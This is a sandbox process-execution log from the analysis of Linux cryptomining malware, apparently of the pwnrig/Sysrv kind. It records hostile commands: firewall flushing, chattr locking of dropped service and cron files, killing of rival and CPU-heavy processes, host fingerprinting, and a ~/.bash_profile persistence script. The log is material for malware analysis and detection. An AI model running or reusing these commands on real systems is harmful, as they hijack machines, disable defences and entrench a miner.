  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-input
      4⤵
      PID:1496
  - - /sbin/iptables
      iptables -Z ufw-reject-input
      4⤵
      PID:1497
  - - /sbin/iptables
      iptables -Z ufw-after-logging-input
      4⤵
      PID:1498
  - - /sbin/iptables
      iptables -Z ufw-after-input
      4⤵
      PID:1499
  - - /sbin/iptables
      iptables -Z ufw-user-input
      4⤵
      PID:1500
  - - /sbin/iptables
      iptables -Z ufw-before-input
      4⤵
      PID:1501
  - - /sbin/iptables
      iptables -Z ufw-before-logging-input
      4⤵
      PID:1502
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-forward
      4⤵
      PID:1503
  - - /sbin/iptables
      iptables -Z ufw-reject-forward
      4⤵
      PID:1504
  - - /sbin/iptables
      iptables -Z ufw-after-logging-forward
      4⤵
      PID:1505
  - - /sbin/iptables
      iptables -Z ufw-after-forward
      4⤵
      PID:1506
  - - /sbin/iptables
      iptables -Z ufw-user-logging-forward
      4⤵
      PID:1507
  - - /sbin/iptables
      iptables -Z ufw-user-forward
      4⤵
      PID:1508
  - - /sbin/iptables
      iptables -Z ufw-before-forward
      4⤵
      PID:1509
  - - /sbin/iptables
      iptables -Z ufw-before-logging-forward
      4⤵
      PID:1510
  - - /sbin/iptables
      iptables -Z ufw-track-forward
      4⤵
      PID:1511
  - - /sbin/iptables
      iptables -Z ufw-track-output
      4⤵
      PID:1512
  - - /sbin/iptables
      iptables -Z ufw-track-input
      4⤵
      PID:1513
  - - /sbin/iptables
      iptables -Z ufw-skip-to-policy-output
      4⤵
      PID:1514
  - - /sbin/iptables
      iptables -Z ufw-reject-output
      4⤵
      PID:1515
  - - /sbin/iptables
      iptables -Z ufw-after-logging-output
      4⤵
      PID:1516
  - - /sbin/iptables
      iptables -Z ufw-after-output
      4⤵
      PID:1517
  - - /sbin/iptables
      iptables -Z ufw-user-logging-output
      4⤵
      PID:1518
  - - /sbin/iptables
      iptables -Z ufw-user-output
      4⤵
      PID:1519
  - - /sbin/iptables
      iptables -Z ufw-before-output
      4⤵
      PID:1520
  - - /sbin/iptables
      iptables -Z ufw-before-logging-output
      4⤵
      PID:1521
  - - /sbin/iptables
      iptables -X ufw-logging-deny
      4⤵
      PID:1522
  - - /sbin/iptables
      iptables -X ufw-logging-allow
      4⤵
      PID:1523
  - - /sbin/iptables
      iptables -X ufw-not-local
      4⤵
      PID:1524
  - - /sbin/iptables
      iptables -X ufw-user-logging-input
      4⤵
      PID:1525
  - - /sbin/iptables
      iptables -X ufw-user-logging-output
      4⤵
      PID:1526
  - - /sbin/iptables
      iptables -X ufw-user-logging-forward
      4⤵
      PID:1527
  - - /sbin/iptables
      iptables -X ufw-user-limit-accept
      4⤵
      PID:1528
  - - /sbin/iptables
      iptables -X ufw-user-limit
      4⤵
      PID:1529
  - - /sbin/iptables
      iptables -X ufw-user-input
      4⤵
      PID:1530
  - - /sbin/iptables
      iptables -X ufw-user-forward
      4⤵
      PID:1531
  - - /sbin/iptables
      iptables -X ufw-user-output
      4⤵
      PID:1532
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-input
      4⤵
      PID:1533
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-output
      4⤵
      PID:1534
  - - /sbin/iptables
      iptables -X ufw-skip-to-policy-forward
      4⤵
      PID:1535
  - - /sbin/iptables
      iptables -P INPUT ACCEPT
      4⤵
      PID:1536
  - - /sbin/iptables
      iptables -P OUTPUT ACCEPT
      4⤵
      PID:1537
  - - /sbin/iptables
      iptables -P FORWARD ACCEPT
      4⤵
      PID:1538
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-deny
      4⤵
      PID:1539
  - - /sbin/ip6tables
      ip6tables -F ufw6-logging-allow
      4⤵
      PID:1540
  - - /sbin/ip6tables
      ip6tables -F ufw6-not-local
      4⤵
      PID:1541
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-input
      4⤵
      PID:1542
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit-accept
      4⤵
      PID:1543
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-limit
      4⤵
      PID:1544
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-input
      4⤵
      PID:1545
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-input
      4⤵
      PID:1546
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-input
      4⤵
      PID:1547
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-input
      4⤵
      PID:1548
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-input
      4⤵
      PID:1549
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-input
      4⤵
      PID:1550
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-input
      4⤵
      PID:1551
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-forward
      4⤵
      PID:1552
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-forward
      4⤵
      PID:1553
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-forward
      4⤵
      PID:1554
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-forward
      4⤵
      PID:1555
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-forward
      4⤵
      PID:1556
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-forward
      4⤵
      PID:1557
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-forward
      4⤵
      PID:1558
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-forward
      4⤵
      PID:1559
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-forward
      4⤵
      PID:1560
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-output
      4⤵
      PID:1561
  - - /sbin/ip6tables
      ip6tables -F ufw6-track-input
      4⤵
      PID:1562
  - - /sbin/ip6tables
      ip6tables -F ufw6-skip-to-policy-output
      4⤵
      PID:1563
  - - /sbin/ip6tables
      ip6tables -F ufw6-reject-output
      4⤵
      PID:1564
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-logging-output
      4⤵
      PID:1565
  - - /sbin/ip6tables
      ip6tables -F ufw6-after-output
      4⤵
      PID:1566
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-logging-output
      4⤵
      PID:1567
  - - /sbin/ip6tables
      ip6tables -F ufw6-user-output
      4⤵
      PID:1568
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-output
      4⤵
      PID:1569
  - - /sbin/ip6tables
      ip6tables -F ufw6-before-logging-output
      4⤵
      PID:1570
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-deny
      4⤵
      PID:1571
  - - /sbin/ip6tables
      ip6tables -Z ufw6-logging-allow
      4⤵
      PID:1572
  - - /sbin/ip6tables
      ip6tables -Z ufw6-not-local
      4⤵
      PID:1573
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-input
      4⤵
      PID:1574
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit-accept
      4⤵
      PID:1575
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-limit
      4⤵
      PID:1576
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-input
      4⤵
      PID:1577
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-input
      4⤵
      PID:1578
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-input
      4⤵
      PID:1579
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-input
      4⤵
      PID:1580
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-input
      4⤵
      PID:1581
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-input
      4⤵
      PID:1582
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-input
      4⤵
      PID:1583
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-forward
      4⤵
      PID:1584
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-forward
      4⤵
      PID:1585
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-forward
      4⤵
      PID:1586
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-forward
      4⤵
      PID:1587
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-forward
      4⤵
      PID:1588
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-forward
      4⤵
      PID:1589
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-forward
      4⤵
      PID:1590
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-forward
      4⤵
      PID:1591
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-forward
      4⤵
      PID:1592
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-output
      4⤵
      PID:1593
  - - /sbin/ip6tables
      ip6tables -Z ufw6-track-input
      4⤵
      PID:1594
  - - /sbin/ip6tables
      ip6tables -Z ufw6-skip-to-policy-output
      4⤵
      PID:1595
  - - /sbin/ip6tables
      ip6tables -Z ufw6-reject-output
      4⤵
      PID:1596
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-logging-output
      4⤵
      PID:1597
  - - /sbin/ip6tables
      ip6tables -Z ufw6-after-output
      4⤵
      PID:1598
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-logging-output
      4⤵
      PID:1599
  - - /sbin/ip6tables
      ip6tables -Z ufw6-user-output
      4⤵
      PID:1600
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-output
      4⤵
      PID:1601
  - - /sbin/ip6tables
      ip6tables -Z ufw6-before-logging-output
      4⤵
      PID:1602
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-deny
      4⤵
      PID:1603
  - - /sbin/ip6tables
      ip6tables -X ufw6-logging-allow
      4⤵
      PID:1604
  - - /sbin/ip6tables
      ip6tables -X ufw6-not-local
      4⤵
      PID:1605
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-input
      4⤵
      PID:1606
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-output
      4⤵
      PID:1607
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-logging-forward
      4⤵
      PID:1608
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit-accept
      4⤵
      PID:1609
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-limit
      4⤵
      PID:1610
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-input
      4⤵
      PID:1611
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-forward
      4⤵
      PID:1612
  - - /sbin/ip6tables
      ip6tables -X ufw6-user-output
      4⤵
      PID:1613
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-input
      4⤵
      PID:1614
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-output
      4⤵
      PID:1615
  - - /sbin/ip6tables
      ip6tables -X ufw6-skip-to-policy-forward
      4⤵
      PID:1616
  - - /sbin/ip6tables
      ip6tables -P INPUT ACCEPT
      4⤵
      PID:1617
  - - /sbin/ip6tables
      ip6tables -P OUTPUT ACCEPT
      4⤵
      PID:1618
  - - /sbin/ip6tables
      ip6tables -P FORWARD ACCEPT
      4⤵
      PID:1619
- /usr/bin/bash
  bash -c "iptables -P INPUT ACCEPT"
  2⤵
  PID:1620
- /usr/sbin/iptables
  iptables -P INPUT ACCEPT
  2⤵
  PID:1620
- /usr/bin/bash
  bash -c "iptables -P OUTPUT ACCEPT"
  2⤵
  PID:1621
- /usr/sbin/iptables
  iptables -P OUTPUT ACCEPT
  2⤵
  PID:1621
- /usr/bin/bash
  bash -c "iptables -P FORWARD ACCEPT"
  2⤵
  PID:1622
- /usr/sbin/iptables
  iptables -P FORWARD ACCEPT
  2⤵
  PID:1622
- /usr/bin/bash
  bash -c "iptables -F"
  2⤵
  PID:1623
- /usr/sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:1623
- /usr/bin/bash
  bash -c "chattr -ia /etc/ld.so.preload"
  2⤵
  PID:1624
- /usr/bin/chattr
  chattr -ia /etc/ld.so.preload
  2⤵
  - Attempts to change immutable files
  PID:1624
- /usr/bin/lsof
  lsof -t -i :444
  2⤵
  - Attempts to change immutable files
  - Enumerates active TCP sockets
  - Reads system network configuration
  - Reads runtime system information
  PID:1625
- /usr/bin/lsof
  lsof -t -i :59475
  2⤵
  - Attempts to change immutable files
  - Enumerates active TCP sockets
  - Reads system network configuration
  - Reads runtime system information
  PID:1626
- /usr/bin/pgrep
  pgrep -f ksysrvthread
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1627
- /usr/bin/pgrep
  pgrep -f sysrv
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1628
- /usr/bin/pgrep
  pgrep -f klibsystem4
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1629
- /usr/bin/pgrep
  pgrep -f klibsystem5
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1630
- /usr/bin/chattr
  chattr +ia /etc/init.d/dpkg-deb-package
  2⤵
  - Attempts to change immutable files
  PID:1631
- /etc/init.d/dpkg-deb-package
  /etc/init.d/dpkg-deb-package start
  2⤵
  - Executes dropped EXE
  PID:1633
- - /usr/bin/cp
    cp -f -r -- /bin/dpkg-debian /bin/dpkg-deb-package
    3⤵
    PID:1635
- - /usr/bin/rm
    rm -rf -- dpkg-deb-package
    3⤵
    PID:1637
- /usr/bin/chattr
  chattr +ia /etc/systemd/system/dpkg-deb-package.service
  2⤵
  - Attempts to change immutable files
  PID:1638
- /usr/bin/systemctl
  systemctl daemon-reload
  2⤵
  - Reads EFI boot settings
  PID:1639
- /tmp/-python37-590b56ce-9e47-4539-accf-0eb74a649a38
  /tmp/-python37-590b56ce-9e47-4539-accf-0eb74a649a38
  2⤵
  - Executes dropped EXE
  - Writes file to tmp directory
  PID:1640
- /tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
  /tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
  2⤵
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  - Writes file to tmp directory
  PID:1642
- - /bin/sh
    sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
    3⤵
    - Attempts to change immutable files
    PID:1668
  - - /usr/bin/hostname
      hostname -I
      4⤵
      Attempts to change immutable files
      PID:1671
  - - /usr/bin/awk
      awk "{print \$1}"
      4⤵
      PID:1673
  - - /usr/bin/awk
      awk "{print \"-\"\$2}"
      4⤵
      PID:1678
  - - /usr/bin/head
      head -n 1
      4⤵
      PID:1677
  - - /usr/bin/grep
      grep "Port "
      4⤵
      PID:1676
  - - /usr/bin/cat
      cat /etc/ssh/sshd_config
      4⤵
      PID:1675
  - - /usr/bin/whoami
      whoami
      4⤵
      PID:1679
  - - /usr/bin/hostname
      hostname
      4⤵
      PID:1680
  - - /usr/bin/grep
      grep -c "^processor" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:1681
  - - /usr/bin/sed
      sed -e "s/\$//"
      4⤵
      PID:1687
  - - /usr/bin/sed
      sed -e "s/^ *//"
      4⤵
      PID:1686
  - - /usr/bin/cut
      cut -d: -f2
      4⤵
      PID:1685
  - - /usr/bin/grep
      grep -m 1 "model name" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:1684
  - - /usr/bin/awk
      awk "{print \$1}"
      4⤵
      Reads runtime system information
      PID:1690
  - - /usr/bin/awk
      awk "{print \$4}"
      4⤵
      PID:1693
  - - /usr/bin/awk
      awk "{print \$4}"
      4⤵
      PID:1696
- - /bin/sh
    sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:1697
  - - /usr/bin/awk
      awk "/[zZ]/ && !a[\$2]++ {print \$2}"
      4⤵
      PID:1699
  - - /usr/bin/ps
      ps -A "-ostat,ppid"
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1698
  - - /usr/bin/id
      id -u
      4⤵
      PID:1701
  - - /usr/bin/grep
      grep -v grep
      4⤵
      PID:1704
  - - /usr/bin/grep
      grep /etc/cron
      4⤵
      PID:1703
  - - /usr/bin/ps
      ps x
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1702
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:1706
  - - /usr/bin/id
      id -u
      4⤵
      PID:1707
  - - /usr/bin/awk
      awk "{if(\$3>30.0) print \$2}"
      4⤵
      PID:1712
  - - /usr/bin/grep
      grep -v /usr/sbin/httpd
      4⤵
      PID:1711
  - - /usr/bin/grep
      grep -v -- "-bash[[:space:]]*\$"
      4⤵
      PID:1710
  - - /usr/bin/grep
      grep -v grep
      4⤵
      PID:1709
  - - /usr/bin/ps
      ps aux
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1708
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
    3⤵
    PID:1731
  - - /usr/bin/id
      id -u
      4⤵
      PID:1732
  - - /usr/bin/wc
      wc -l
      4⤵
      PID:1739
  - - /usr/bin/awk
      awk "{if(\$3>30.0) print \$2}"
      4⤵
      PID:1738
  - - /usr/bin/grep
      grep -- "-bash[[:space:]]*\$"
      4⤵
      PID:1736
  - - /usr/bin/grep
      grep -v grep
      4⤵
      PID:1735
  - - /usr/bin/ps
      ps aux
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1734
- /usr/bin/systemctl
  systemctl enable dpkg-deb-package.service
  2⤵
  - Reads EFI boot settings
  - Enumerates kernel/hardware configuration
  PID:1727
- - /lib/systemd/systemd-sysv-install
    /lib/systemd/systemd-sysv-install enable dpkg-deb-package
    3⤵
    - Attempts to change immutable files
    PID:1728
  - - /usr/bin/getopt
      getopt -o r: --long root: -- enable dpkg-deb-package
      4⤵
      PID:1729
  - - /usr/sbin/update-rc.d
      /usr/sbin/update-rc.d dpkg-deb-package defaults
      4⤵
      PID:1730
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1737
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1737
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1737
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Reads EFI boot settings
        
        PID:1737
  - - /usr/sbin/update-rc.d
      /usr/sbin/update-rc.d dpkg-deb-package enable
      4⤵
      PID:1771
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1772
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1772
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1772
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Reads EFI boot settings
        Enumerates kernel/hardware configuration
        
        PID:1772
- /usr/bin/chattr
  chattr +ia /bin/dpkg-debian
  2⤵
  - Attempts to change immutable files
  PID:1824
- /usr/bin/crontab
  crontab -r
  2⤵
  PID:1825
- /usr/bin/pkill
  pkill -f .klibsystem4
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1826
- /usr/bin/bash
  bash -c "echo \"5 * * * * nohup /var/tmp/.klibsystem5 >/dev/null 2>&1 &\" | crontab -"
  2⤵
  PID:1827
- - /usr/bin/crontab
    crontab -
    3⤵
    - Creates/modifies Cron job
    PID:1829
- /usr/bin/chattr
  chattr +ia /etc/cron.d/.lib-knlib4
  2⤵
  - Attempts to change immutable files
  PID:1830
- /usr/bin/chattr
  chattr +ia /var/spool/cron/.lib-knlib4
  2⤵
  - Attempts to change immutable files
  PID:1831
- /usr/bin/chattr
  chattr +ia /etc/cron.hourly/.lib-knlib4
  2⤵
  - Attempts to change immutable files
  PID:1832
- /usr/bin/chattr
  chattr +ia /etc/cron.daily/.lib-knlib4
  2⤵
  - Attempts to change immutable files
  PID:1833
- /usr/bin/chattr
  chattr +ia /etc/cron.weekly/.lib-knlib4
  2⤵
  - Attempts to change immutable files
  PID:1834
- /usr/bin/chattr
  chattr +ia /etc/cron.monthly/.lib-knlib4
  2⤵
  - Attempts to change immutable files
  PID:1835
- /usr/bin/chattr
  chattr -ia /etc/anacrontab
  2⤵
  - Attempts to change immutable files
  PID:1836
- /usr/bin/chattr
  chattr +ia /etc/anacrontab
  2⤵
  - Attempts to change immutable files
  PID:1837
- /tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
  /tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
  2⤵
  - Executes dropped EXE
  - Checks hardware identifiers (DMI)
  - Reads hardware information
  - Checks CPU configuration
  - Reads CPU attributes
  - Enumerates kernel/hardware configuration
  PID:1838
- - /bin/sh
    sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
    3⤵
    - Attempts to change immutable files
    PID:1839
  - - /usr/bin/hostname
      hostname -I
      4⤵
      Attempts to change immutable files
      PID:1842
  - - /usr/bin/awk
      awk "{print \$1}"
      4⤵
      PID:1844
  - - /usr/bin/awk
      awk "{print \"-\"\$2}"
      4⤵
      PID:1849
  - - /usr/bin/head
      head -n 1
      4⤵
      PID:1848
  - - /usr/bin/grep
      grep "Port "
      4⤵
      PID:1847
  - - /usr/bin/cat
      cat /etc/ssh/sshd_config
      4⤵
      PID:1846
  - - /usr/bin/whoami
      whoami
      4⤵
      PID:1850
  - - /usr/bin/hostname
      hostname
      4⤵
      PID:1851
  - - /usr/bin/grep
      grep -c "^processor" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:1852
  - - /usr/bin/sed
      sed -e "s/^ *//"
      4⤵
      PID:1857
  - - /usr/bin/sed
      sed -e "s/\$//"
      4⤵
      PID:1858
  - - /usr/bin/cut
      cut -d: -f2
      4⤵
      PID:1856
  - - /usr/bin/grep
      grep -m 1 "model name" /proc/cpuinfo
      4⤵
      Checks CPU configuration
      PID:1855
  - - /usr/bin/awk
      awk "{print \$1}"
      4⤵
      PID:1861
  - - /usr/bin/awk
      awk "{print \$4}"
      4⤵
      PID:1864
  - - /usr/bin/awk
      awk "{print \$4}"
      4⤵
      PID:1867
- - /bin/sh
    sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
    3⤵
    PID:1868
  - - /usr/bin/awk
      awk "/[zZ]/ && !a[\$2]++ {print \$2}"
      4⤵
      PID:1870
  - - /usr/bin/ps
      ps -A "-ostat,ppid"
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1869
  - - /usr/bin/id
      id -u
      4⤵
      PID:1872
  - - /usr/bin/grep
      grep -v grep
      4⤵
      PID:1875
  - - /usr/bin/grep
      grep /etc/cron
      4⤵
      PID:1874
  - - /usr/bin/ps
      ps x
      4⤵
      Reads CPU attributes
      Reads runtime system information
      PID:1873
- - /bin/sh
    sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 